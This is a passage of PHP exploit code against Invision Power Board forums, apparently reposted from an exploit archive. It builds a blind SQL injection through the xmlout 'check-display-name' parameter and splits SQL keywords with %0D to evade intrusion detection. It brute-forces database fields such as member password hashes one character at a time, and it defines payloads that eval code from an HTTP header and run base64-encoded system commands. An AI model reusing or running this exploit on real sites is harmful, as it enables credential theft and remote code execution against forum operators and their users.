Invision Power Board(8)
  Add date: 10/16/2008   Publishing date: 10/16/2008   Hits: 9
 

$this->chr_num = range(0, 9);
$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
$this->chr_ip  = array_merge( $this->chr_num, array('.') );
$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );
$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );

# SQL Injection
$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';

# IDS Evasion via %0D
$this->def_inj   = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #";

# Results
$this->data = array();
$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');

# Misc
$this->stat     = array(-1 => '-', 0 => '/', 1 => '+');
$this->s_bypass = false;
$this->res_sep  = md5(rand());
$this->def_ip   = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);

# PHP Code
$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';
$this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));";
$this->php_send .= "print('$this->res_sep');exit(0);";

# Regex
$this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i";
$this->reg_cpre = '#^(.*)session_id$#';
# $this->reg_acp  = '#<a href="(.*)"[\x20]+target="_blank"#i';

# Default client headers
$this->s_agent = 'Mozilla Firefox';
$this->s_ip    = $this->def_ip;

return;
}

function bf_inj()
{
$this->sub_chr = $this->t_bchar;
$this->key_val = '';

if( !empty($this->t_key) )
$this->msg('', 0);

while( true )
{
if( $this->t_bchar < 0 )
$this->sub_chr--;

else
$this->sub_chr++;

# 0-9a-f
for( $j=0;$j<=count($this->t_char);$j++ )
{
# That one ?
$chr = $this->t_char[$j];

# Latest char ?
if( $j === count($this->t_char) )
$chr = $this->t_end;

# Ascii num
$asc = ord($chr);

# Screen bug
if( !empty($this->t_key) )
{
$msg  = $this->t_key.'='.$this->key_val;
$msg .= ($chr === $this->t_end ? "\x20" : $chr);

$this->msg($msg, 0, 1, 1);
}

# Focus on the target ?
if( !empty($this->t_join) )
{
$inj =
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join.
' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field.
','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;
}
else
{
$inj =
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
',1))='.$asc.' '.$this->t_add_0;
}

# SQL Injection via rawurldecode()
$inj = str_replace('%rep_req%', $inj, $this->def_inj);

 